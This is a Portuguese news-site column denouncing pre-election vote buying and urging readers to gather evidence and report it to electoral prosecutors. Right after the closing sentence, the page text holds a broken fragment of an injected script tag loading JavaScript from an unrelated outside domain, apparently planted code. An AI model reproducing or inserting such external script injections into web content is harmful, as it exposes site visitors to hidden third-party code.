InícioColunasCompra de Votos

Compra de Votos

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

Para muitos, o mês mais aguardado desse ano não é o mês da copa do mundo e sim o mês que antecede as eleições, o motivo é que nesse mês acontece a chamada farra da compra de votos.

 

Inúmeros políticos oferecendo de tudo que você possa imaginar para conseguir um votinho. Gasolina, cestas básicas, dinheiro vivo, etc. afinal, na eleição vale tudo só não vale perder.

 

Esse ano não será diferente, mas no que afeta a população a compra de votos? Afeta a democracia, a honestidade, a eficiência e por ai vai. Políticos honestos não compram votos.

 

Reflitam: muitos candidatos a cargos de vereador, em cidades como Canoinhas, chegam a gastar 200, 300 mil reais na campanha, sabendo que por meios legais seria impossível recuperar esse dinheiro, eles investem essa quantidade enorme de dinheiro por que querem ajudar a população? Até parece…

A única certeza que você pode ter é quem gasta muito dinheiro na campanha e compra votos tem só um objetivo como mandatário, roubar!

 

É importante frisar que a compra de votos é um sistema que envolve também favores, promessas de cargos e de empregos.

 

Esse ano poderemos fazer diferente, durante as eleições, quando vierem te oferecer alguma coisa pelo seu voto, filme, grave, tire fotos, produza provas e denuncie o fato ao Ministério Público Eleitoral de sua cidade ou região.

 

O ideal é que as denúncias apresentem o maior número de detalhes, indicando, sempre que possível, os nomes dos envolvidos nas fraudes e o local onde ocorreu ou está ocorrendo o fato criminoso. Se dispuser de documentos, fotos ou vídeos que comprovem a prática do crime denunciado, eles também podem ser enviados ao Ministério Público Eleitoral.

 

O nome do denunciante poderá ser mantido em sigilo.

Assim manteremos os bandidos bem longe do poder público…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.